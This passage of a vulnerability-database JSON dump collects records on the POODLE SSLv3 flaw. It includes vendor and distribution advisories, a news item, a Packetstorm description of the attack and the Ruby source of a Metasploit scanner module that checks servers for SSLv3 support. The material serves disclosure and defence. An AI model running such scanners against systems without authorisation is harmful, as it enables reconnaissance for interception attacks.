"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2016-09-04T20:53:35", "references": ["https://www.openssl.org/news/secadv_20141015.txt", "https://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844"], "description": "The OpenSSL Project has released a new version of the encryption software, which patches several security flaws, including the bug that is exploited by the [POODLE attack on SSLv3](<https://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>).\n\nThe updated versions of OpenSSL come just a couple of days after a trio of researchers at Google revealed the POODLE attack, which allows an attacker to force the use of SSLv3 in some circumstances and eventually decrypt the protected communications between the client and server. To address the issue, OpenSSL has added support for the TLS_FALLBACK_SCSV mechanism, which prevents attackers from being able to force downgrades from TLS to SSLv3.\n\n\u201cOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications to block the ability for a MITM attacker to force a protocol downgrade,\u201d the advisory says.\n\n\u201cSome client applications (such as browsers) will reconnect using a downgraded protocol to work around interoperability bugs in older servers. This could be exploited by an active man-in-the-middle to downgrade connections to SSL 3.0 even if both sides of the connection support higher protocols. SSL 3.0 contains a number of weaknesses including POODLE (CVE-2014-3566).\u201d\n\nThe updated versions of OpenSSL also include a fix for a high-risk vulnerability in the DTLS SRTP extension that can cause a memory leak.\n\n\u201cA flaw in the DTLS SRTP extension parsing code allows an attacker, who sends a carefully crafted handshake message, to cause OpenSSL to fail to free up to 64k of memory causing a memory leak. This could be exploited in a Denial Of Service attack. This issue affects OpenSSL 1.0.1 server implementations for both SSL/TLS and DTLS regardless of whether SRTP is used or configured. Implementations of OpenSSL that have been compiled with OPENSSL_NO_SRTP defined are not affected,\u201d the [advisory](<https://www.openssl.org/news/secadv_20141015.txt>) says.\n\nThere also is a patch for a low-risk vulnerability that results from a problem in the \u201cno-ssl3\u201d build option that could still allow servers to complete an SSLv3 handshake.", "edition": 1, "reporter": "Dennis Fisher", "published": "2014-10-16T10:29:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "threatpost", "title": "OpenSSL Releases Patch for POODLE Attack", "threatPostCategory": "Cryptography", "bulletinFamily": "info", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-16T14:29:53", "id": "OPENSSL-RELEASES-PATCH-FOR-POODLE-ATTACK/108875", "href": "https://threatpost.com/openssl-releases-patch-for-poodle-attack/108875/", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "metasploit": [{"lastseen": "2018-08-10T03:18:42", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Check if an HTTP server supports a given version of SSL/TLS. If a web server can successfully establish an SSLv3 session, it is likely to be vulnerable to the POODLE attack described on October 14, 2014, as a patch against the attack is unlikely.", "reporter": "Rapid7", "published": "2014-10-17T16:25:14", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/http/ssl_version.rb", "type": "metasploit", "title": "HTTP SSL/TLS Version Detection (POODLE scanner)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/HTTP/SSL_VERSION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/http'\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'HTTP SSL/TLS Version Detection (POODLE scanner)',\n 'Description' => %q{\n Check if an HTTP server supports a given version of SSL/TLS.\n\n If a web server can successfully establish an SSLv3 session, it is\n likely to be vulnerable to the POODLE attack described on\n October 14, 2014, as a patch against the attack is unlikely.\n },\n 'Author' => 'todb',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 443,\n },\n 'References' =>\n [\n [ 'URL', 'http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html'],\n [ 'OSVDB', '113251'],\n [ 'CVE', '2014-3566']\n ],\n 'DisclosureDate' => 'Oct 14 2014'\n )\n\n register_options(\n [\n Opt::SSLVersion\n ]\n )\n\n end\n\n # Fingerprint a single host\n def run_host(ip)\n begin\n res = send_request_raw({ 'uri' => '/', 'method' => 'GET' })\n fp = http_fingerprint(:response => res)\n if fp\n vprint_status(\"#{peer} connected and fingerprinted: #{fp}\")\n # TODO: Interrogate the connection itself to see what version\n # was used. Where that actually lives is eluding me. :/\n if datastore['SSL'] && datastore['SSLVersion'] == 'SSL3'\n print_good(\"#{peer} accepts SSLv3\")\n report_poodle_vuln(ip)\n end\n end\n rescue ::OpenSSL::SSL::SSLError => e\n ssl_version = e.message.match(/ state=([^\\s]+)/)[1]\n vprint_status(\"#{peer} does not accept #{ssl_version}\")\n end\n end\n\n def report_poodle_vuln(ip)\n report_vuln(\n :host => ip,\n :port => rport,\n :proto => 'tcp',\n :name => self.name,\n :info => \"Module #{self.fullname} confirmed SSLv3 is available\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n )\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/ssl_version.rb"}], "huawei": [{"lastseen": "2016-09-05T13:35:31", "references": [], "edition": 1, "description": "The SSLv3 protocol supported by some Huawei products has the so-called Padding Oracle On Downgraded Legacy Encryption (POODLE) vulnerability. The attacker can launch a man-in-the-middle attack to manipulate the TLS negotiation process so that the communication parties use SSLv3, which has information disclosure vulnerability (vulnerability ID: HWPSIRT-2014-1041).\n\nThis Vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2014-3566.", "reporter": "Huawei Technologies", "published": "2014-12-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "huawei", "title": "Security Advisory-SSLv3 POODLE Vulnerability in Huawei Products", "bulletinFamily": "software", "affectedSoftware": [{"name": "S6300", "version": "V200R003C00", "operator": "eq"}, {"name": "CH220", "version": "V100R001C00", "operator": "eq"}, {"name": "S5300", "version": "V200R006C00", "operator": "eq"}, {"name": "9300E", "version": "V200R006C00", "operator": "eq"}, {"name": "eSpace Agent Desktop", "version": "V200R001C03", "operator": "eq"}, {"name": "S6700", "version": "V200R005C00", "operator": "eq"}, {"name": "S6300", "version": "V200R005C00", "operator": "eq"}, {"name": "9300E", "version": "V200R003C00", "operator": "eq"}, {"name": "RH2288 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "S5700", "version": "V200R005C00", "operator": "eq"}, {"name": "E9000 Chassis", "version": "V100R001C00", "operator": "eq"}, {"name": "S9300", "version": "V200R005C00", "operator": "eq"}, {"name": "AC6605", "version": "V200R001C00\n V200R002C00\n V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "BH620 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "CH121", "version": "V100R001C00", "operator": "eq"}, {"name": "eSight Network", "version": "V200R003C10", "operator": "eq"}, {"name": "AP6610DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "9700", "version": "V200R003C00", "operator": "eq"}, {"name": "S6700", "version": "V200R003C00", "operator": "eq"}, {"name": "7700", "version": "V200R001C00", "operator": "eq"}, {"name": "S2300", "version": "V100R006C00", "operator": "eq"}, {"name": "S9300", "version": "V200R001C00", "operator": "eq"}, {"name": "S5300", "version": "V200R003C00", "operator": "eq"}, {"name": "RH5885 V3", "version": "V100R003C00/ C01", "operator": "eq"}, {"name": "CH242", "version": "V100R001C00", "operator": "eq"}, {"name": "OceanStor ReplicationDirector", "version": "V100R003C00", "operator": "eq"}, {"name": "S3700", "version": "V100R006C03", "operator": "eq"}, {"name": "AR3200", "version": "V200R005C32", "operator": "eq"}, {"name": "E6000 Chassis", "version": "V100R001C00", "operator": "eq"}, {"name": "9700", "version": "V100R006C00", "operator": "eq"}, {"name": "AP7110DN-AGN-FAT", "version": "V200R005C00", "operator": "eq"}, {"name": "S3300", "version": "V100R006C05", "operator": "eq"}, {"name": "S2300", "version": "V100R006C05", "operator": "eq"}, {"name": "7700", "version": "V200R006C00", "operator": "eq"}, {"name": "AP6510DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "S3300", "version": "V100R006C00", "operator": "eq"}, {"name": "CH242V3", "version": "V100R001C00", "operator": "eq"}, {"name": "AP6010DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "AC6005", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "S5300", "version": "V200R005C00", "operator": "eq"}, {"name": "BH622 V2", "version": "V100R002C00", "operator": "eq"}, {"name": "9300E", "version": "V200R005C00", "operator": "eq"}, {"name": "eSight UC&C", "version": "V100R002C00", "operator": "eq"}, {"name": "AP5130DN-FAT", "version": "V200R005C00", "operator": "eq"}, {"name": "ManageOne", "version": "V100R002C00/ C10/ C20", "operator": "eq"}, {"name": "CH140", "version": "V100R001C00", "operator": "eq"}, {"name": "S2700", "version": "V100R006C03", "operator": "eq"}, {"name": "S5700", "version": "V200R003C00", "operator": "eq"}, {"name": "9700", "version": "V200R001C00", "operator": "eq"}, {"name": "S2700", "version": "V100R006C05", "operator": "eq"}, {"name": "eSight Network", "version": "V200R005C00", "operator": "eq"}, {"name": "AP5010SN-GN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "9300E", "version": "V100R006C00", "operator": "eq"}, {"name": "eSpace U2980", "version": "V100R001C01\n V100R001C02SPC200", "operator": "eq"}, {"name": "AR3200", "version": "V200R005C30", "operator": "eq"}, {"name": "ACU2", "version": "V200R005C00", "operator": "eq"}, {"name": "7700", "version": "V200R003C00", "operator": "eq"}, {"name": "CH240", "version": "V100R001C00", "operator": "eq"}, {"name": "eSpace USM", "version": "V100R001 C10", "operator": "eq"}, {"name": "AP5030DN-FAT", "version": "V200R005C00", "operator": "eq"}, {"name": "AP6010SN-GN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "eSight UC&C", "version": "V100R001C20", "operator": "eq"}, {"name": "S5300", "version": "V200R001C00", "operator": "eq"}, {"name": "S9300", "version": "V100R006C00", "operator": "eq"}, {"name": "eSight UC&C", "version": "V100R001C01", "operator": "eq"}, {"name": "7700", "version": "V200R005C00", "operator": "eq"}, {"name": "OceanStor ReplicationDirector", "version": "V100R002C10", "operator": "eq"}, {"name": "9700", "version": "V200R005C00", "operator": "eq"}, {"name": "S9300", "version": "V200R006C00", "operator": "eq"}, {"name": "9700", "version": "V200R006C00", "operator": "eq"}, {"name": "S2700", "version": "V100R006C00", "operator": "eq"}, {"name": "S6700", "version": "V200R001C00", "operator": "eq"}, {"name": "CH221", "version": "V100R001C00", "operator": "eq"}, {"name": "S5700", "version": "V200R001C00", "operator": "eq"}, {"name": "S5700", "version": "V200R006C00", "operator": "eq"}, {"name": "S2300", "version": "V100R006C03", "operator": "eq"}, {"name": "S3300", "version": "V100R006C03", "operator": "eq"}, {"name": "S12700", "version": "V200R005C00", "operator": "eq"}, {"name": "S3700", "version": "V100R006C05", "operator": "eq"}, {"name": "S9300", "version": "V200R003C00", "operator": "eq"}, {"name": "eSpace ECS", "version": "V200R002C00", "operator": "eq"}, {"name": "S6300", "version": "V200R001C00", "operator": "eq"}, {"name": "AP3010DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "9300E", "version": "V200R001C00", "operator": "eq"}, {"name": "AP5010DN-AGN-FAT", "version": "V200R003C00\n V200R005C00", "operator": "eq"}, {"name": "7700", "version": "V100R006C00", "operator": "eq"}, {"name": "CH222", "version": "V100R002C00", "operator": "eq"}, {"name": "ManageOne SC", "version": "V100R002C20", "operator": "eq"}, {"name": "S12700", "version": "V200R006C00", "operator": "eq"}, {"name": "S3700", "version": "V100R006C00", "operator": "eq"}, {"name": "eSpace USM", "version": "V100R001C01", "operator": "eq"}], "cvelist": ["CVE-2014-3566"], "modified": "2015-05-05T00:00:00", "id": "HUAWEI-SA-20141215-01-POODLE", "href": "http://www.huawei.com/en/psirt/security-advisories/2015/hw-405500", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:18", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=526208", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3566", "https://bugs.gentoo.org/show_bug.cgi?id=523216", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6610"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "11.13.1", "packageName": "net-misc/asterisk", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nAsterisk is an open source telephony engine and toolkit.\n\n### Description\n\nMultiple unspecified vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could exploit the vulnerabilities to cause a man in the middle attack or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Asterisk users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-11.13.1\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2014-11-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Asterisk: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-6610"], "modified": "2014-11-23T00:00:00", "id": "GLSA-201411-10", "href": "https://security.gentoo.org/glsa/201411-10", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-06T19:46:09", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3566", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8708", "https://bugs.gentoo.org/show_bug.cgi?id=570692", "https://bugs.gentoo.org/show_bug.cgi?id=569010", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8614", "https://bugs.gentoo.org/show_bug.cgi?id=525588"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.13.2", "packageName": "mail-client/claws-mail", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nClaws Mail is a GTK based e-mail client.\n\n### Description\n\nMultiple vulnerabilities have been discovered in claws-mail. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker could possibly intercept communications due to the default implementation of SSL 3.0. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll claws-mail users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/claws-mail-3.13.2\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2016-06-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "claws-mail: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8614", "CVE-2014-3566", "CVE-2015-8708"], "modified": "2016-06-26T00:00:00", "id": "GLSA-201606-11", "href": "https://security.gentoo.org/glsa/201606-11", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:51", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568", "https://bugs.gentoo.org/show_bug.cgi?id=525468", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511", "https://bugs.gentoo.org/show_bug.cgi?id=519264", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449", "https://bugs.gentoo.org/show_bug.cgi?id=494816"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.0.1j", "packageName": "dev-libs/openssl", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nOpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to cause a Denial of Service condition, perform Man-in-the-Middle attacks, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSL 1.0.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/openssl-1.0.1j\"\n \n\nAll OpenSSL 0.9.8 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/openssl-0.9.8z_p2\"\n \n\nPackages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying these packages.", "edition": 1, "reporter": "Gentoo Foundation", "published": "2014-12-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "gentoo", "title": "OpenSSL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3505", "CVE-2013-6449", "CVE-2014-3507", "CVE-2014-3513", "CVE-2014-3511", "CVE-2014-3506", "CVE-2013-6450", "CVE-2014-3567", "CVE-2014-3512", "CVE-2014-3510", "CVE-2014-3568", "CVE-2014-3509", "CVE-2014-5139"], "modified": "2015-06-06T00:00:00", "id": "GLSA-201412-39", "href": "https://security.gentoo.org/glsa/201412-39", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:48", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=1064670", "https://bugs.archlinux.org/task/42760", "https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.3_release_notes", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1569", "https://hg.mozilla.org/projects/nss/rev/e9a7991380db"], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "3.17.3-1", "packageFilename": "UNKNOWN", "packageName": "nss", "arch": "any", "operator": "lt"}], "edition": 1, "description": "The definite_length_decoder function in lib/util/quickder.c in Mozilla\nNetwork Security Services (NSS) does not ensure that the DER encoding of\nan ASN.1 length is properly formed, which allows remote attackers to\nconduct data-smuggling attacks by using a long byte sequence for an\nencoding, as demonstrated by the SEC_QuickDERDecodeItem function's\nimproper handling of an arbitrary-length encoding of 0x00.\n\nThis update also adds support for the TLS Fallback Signaling Cipher\nSuite Value (TLS_FALLBACK_SCSV) in NSS, which can be used to prevent\nprotocol downgrade attacks against applications which re-connect using a\nlower SSL/TLS protocol version when the initial connection indicating\nthe highest supported protocol version fails. This can prevent a\nforceful downgrade of the communication to SSL 3.0, mitigating\nCVE-2014-3566, also known as POODLE. SSL 3.0 support has also been\ndisabled by default in this Firefox and Thunderbird update, further\nmitigating POODLE.", "reporter": "Arch Linux", "published": "2014-12-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "nss: signature forgery", "type": "archlinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-1569"], "modified": "2014-12-16T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-December/000176.html", "id": "ASA-201412-18", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:42", "references": ["http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3513", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3567", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3568", "https://www.openssl.org/news/secadv_20141015.txt", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566"], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "1.0.1.j-1", "packageName": "openssl", "arch": "any", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "SRTP Memory Leak (CVE-2014-3513)\n--------------------------------\n\nA flaw in the DTLS SRTP extension parsing code allows an attacker, who\nsends a carefully crafted handshake message, to cause OpenSSL to fail\nto free up to 64k of memory causing a memory leak. This could be\nexploited in a Denial Of Service attack. This issue affects OpenSSL\n1.0.1 server implementations for both SSL/TLS and DTLS regardless of\nwhether SRTP is used or configured. Implementations of OpenSSL that\nhave been compiled with OPENSSL_NO_SRTP defined are not affected.\n\nSession Ticket Memory Leak (CVE-2014-3567)\n------------------------------------------\n\nWhen an OpenSSL SSL/TLS/DTLS server receives a session ticket the\nintegrity of that ticket is first verified. In the event of a session\nticket integrity check failing, OpenSSL will fail to free memory\ncausing a memory leak. By sending a large number of invalid session\ntickets an attacker could exploit this issue in a Denial Of Service\nattack.\n\nBuild option no-ssl3 is incomplete (CVE-2014-3568)\n--------------------------------------------------\n\nWhen OpenSSL is configured with "no-ssl3" as a build option, servers\ncould accept and complete a SSL 3.0 handshake, and clients could be\nconfigured to send them.\n\nSSL 3.0 Fallback protection\n---------------------------\n\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\nto block the ability for a MITM attacker to force a protocol\ndowngrade.\n\nSome client applications (such as browsers) will reconnect using a\ndowngraded protocol to work around interoperability bugs in older\nservers. This could be exploited by an active man-in-the-middle to\ndowngrade connections to SSL 3.0 even if both sides of the connection\nsupport higher protocols. SSL 3.0 contains a number of weaknesses\nincluding POODLE (CVE-2014-3566).", "reporter": "Arch Linux", "published": "2014-10-16T00:00:00", "title": "openssl: denial of service / man-in-the-middle / poodle mitigation", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "archlinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-16T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000117.html", "id": "ASA-201410-6", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "lenovo": [{"lastseen": "2018-02-21T17:01:54", "references": [], "description": "**Lenovo Security Advisory:**** **LEN-2014-007 \n**Potential Impact:** Unauthorized Access; Man-in-the-Middle (MitM) Attack \n**Severity****:** Medium \n\n\n**Summary: ** \nA security [vulnerability](<https://www.openssl.org/~bodo/ssl-poodle.pdf>) known as POODLE was publicly announced that affects a relatively low number of Internet connected devices. However, this vulnerability is critical and could allow an attacker to read encrypted information, even when passed over an SSL connection. Lenovo has listed steps you can take to help protect yourself. \n\n\n**Mitigation Strategy for Customers (what you should do to protect yourself):**\n\n * Upgrade your browser to the latest version [supported](<https://support.zendesk.com/hc/en-us/articles/203661786>) by your IT organization. If using Internet Explorer 6, move to a more modern, supported browser.\n * Disable SSLv3 support within your browser. You can check if your browser is vulnerable by going [here](<https://www.ssllabs.com/ssltest/viewMyClient.html>) and looking for SSLv3 \"Yes\". To disable SSLv3 support, making the following changes and restart your browser: \n * Mozilla Firefox \n * Open about:config, find security.tls.version.min and set the value to 1.\n * Google Chrome \n * Newer versions of Chrome support TLS_FALLBACK_SCSV, which mitigates this issue.\n * You can explicitly disable support for SSLv3 by issuing the command line command --ssl-version-min=tls1. Further instructions about using command line flags can be found [here](<http://www.chromium.org/for-testers/command-line-flags>).\n * Internet Explorer \n * Go into \"Internet Options\", \"advanced\", and uncheck SSLv3.\n * Scan your own infrastructure for this vulnerability using available tools. Two tools are available from [Tinfoil Security](<https://www.tinfoilsecurity.com/poodle>) and [SSL Labs](<https://www.ssllabs.com/ssltest/>).\n * Be cognizant of opportunistic phishers who email you to patch your devices. Don\u2019t click on links that look suspicious.\n * In general it is good practice to reduce the surface area of where a malicious attacker can exploit, so where possible, disable unnecessary services such as web servers.\n * If you are unable to disable web servers that use SSLv3 please limit remote access by applying network segmentation and appropriate access control list to minimize impact.\n * Review the Product Impact list below and update applicable firmware. \n * ThinkPad, ThinkCentre and ThinkStation products should update the Intel Management Engine (ME) Firmware\n * ThinkServer products should update the Base Management Controller (BMC) firmware\n * LenovoEMC should update the Lifeline software\n * Software applications should update to the recommended version\n\n**Update 9/24/15 : **It has come to our attention that the initial ThinkServer BMC fixes for POODLE were incomplete and did not disable SSLv3 on certain services. Please update to the latest ThinkServer BMC version listed below to address this issue. \n\n\n**Product Impact**\n", "edition": 1, "reporter": "Lenovo", "published": "2016-07-22T00:00:00", "type": "lenovo", "title": "POODLE: SSLv3 Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2016-07-22T00:00:00", "id": "LENOVO:PS500041-NOSID", "href": "https://support.lenovo.com/us/en/product_security/poodle", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:04", "references": [], "edition": 1, "description": "", "reporter": "Bruno Luiz", "published": "2015-06-10T00:00:00", "type": "packetstorm", "title": "This POODLE Bites: Exploiting The SSL 3.0 Fallback", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3566", "CVE-2014-0160"], "modified": "2015-06-10T00:00:00", "href": "https://packetstormsecurity.com/files/132254/This-POODLE-Bites-Exploiting-The-SSL-3.0-Fallback.html", "id": "PACKETSTORM:132254", "sourceData": "`Introduction \n \n \nSSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical \npurposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], \nand TLS 1.2 [RFC5246], many TLS implementations remain backwards\u00adcompatible with \nSSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. \nThe protocol handshake provides for authenticated version negotiation, so normally the \nlatest protocol version common to the client and the server will be used. \n \n \nThe POODLE Attack \n \n \nTo work with legacy servers, many TLS clients implement a downgrade dance: in a first \nhandshake attempt, offer the highest protocol version supported by the client\u037e if this \nhandshake fails, retry (possibly repeatedly) with earlier protocol versions. Unlike proper \nprotocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, \nTLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers. \nSo if an attacker that controls the network between the client and the server interferes with \nany attempted handshake offering TLS 1.0 or later, such clients will readily confine \nthemselves to SSL 3.0. \n \n \n \nRecommendations \n \n \nThe attack described above requires an SSL 3.0 connection to be established, so \ndisabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. \nIf either side supports only SSL 3.0, then all hope is gone, and a serious update required \nto avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol \nversion, then the attack is possible if the client uses a downgrade dance for \ninteroperability. \n \n \nImpact \n \n \nThe POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. \nThis affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS \nlibrary (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely \nweb-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, \ncookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that \nuser, accessing database content, etc.). \n \n \nSolution \n \n \nThere is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available. \n \nSome of the same researchers that discovered the vulnerability also developed a fix for one of the \nrerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from \nbeing able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their \nlatest versions and recommend the following upgrades: \n \n- OpenSSL 1.0.1 users should upgrade to 1.0.1j. \n- OpenSSL 1.0.0 users should upgrade to 1.0.0o. \n- OpenSSL 0.9.8 users should upgrade to 0.9.8zc. \n \nBoth clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. \n \nOther SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 or in CERT Vulnerability Note VU#577193.[7] \n \nVulnerable TLS implementations need to be updated. CVE ID 